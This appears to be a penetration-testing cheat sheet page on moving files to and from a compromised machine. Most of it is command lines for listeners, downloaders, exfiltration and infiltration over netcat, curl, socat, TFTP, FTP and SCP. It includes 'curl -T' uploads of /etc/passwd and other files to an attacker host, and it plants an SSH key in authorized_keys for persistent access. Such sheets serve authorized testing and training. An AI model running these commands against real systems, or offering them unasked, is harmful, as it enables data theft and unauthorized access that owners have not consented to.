Skip to main content

File Transfer

tip

To facilitate the file transfer you can encode your executable in base64.

Listeners​

impacket-smbserver <share> .
smbserver.py <share> .
python -m SimpleHTTPServer <port>
python3 -m http.server <port>
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => <port>, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:<port>
nc -nlvp <port> < <file>
tip

-w option allows anonymous write access.

pip install pyftpdlib
python -m pyftpdlib -p 21 -w

TFTP

service atftpd start
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
auxiliary/server/tftp

Downloaders​

wget <url>
curl -O <url> > file
fetch <url> #BSD

Exfiltration​

info

If not mentionned, the first CLI is from Kali and the second from the compromised machine (RSH).

Netcat​

nc -nvlp <port> > <file>
nc -nvv <ip> <port> < <file>

Curl​

nc -nvlp 80 > out
curl -T </etc/passwd> <url_attacker>
curl --upload-file <file> --url http://<attacker_ip>/

Socat​

socat -u FILE:<file> TCP-LISTEN:<port>,reuseaddr
socat -u TCP:127.0.0.1:<port> OPEN:<out.dat>,creat

TFTP​

service atftpd start
auxiliary/server/tftp
tftp -i <ip> PUT <file>
tftp <ip> <<< "put <file1> <file2>"

Infiltration​

tip

If not mentionned, the first CLI is from Kali and the second from the compromised machine (RSH)

FTP​

python -m pyftpdlib -p 21 -w
echo open <ip_target> > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt 
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

ftp -v -n -s:ftp.txt

Netcat​

On target

nc -nlvp <port> > <file>

On kali

nc <ip> <port> < file

Socat​

socat -u TCP-LISTEN:<port> 9876,reuseaddr OPEN:<out.txt>,creat && cat <out.txt>
socat -u FILE:<file> TCP:127.0.0.1:<port>

TFTP​

service atftpd start
auxiliary/server/tftp
tftp -i <ip> GET <file>
tftp <ip> <<< "get <file1> <file2>"

SSH​

info

Add your SSH pub key in authorized keys on the compromised machine (RSH)

echo "ssh-rsa AAAA..." > authorized_keys

Kali

ssh -i <key> <user>@<ip>

SCP​

scp </path/to/source/file.ext> <user>@<ip>:</path/to/destination/file.ext>

scp -r </path/to/source/dir> <user>@<ip>:</path/to/destination>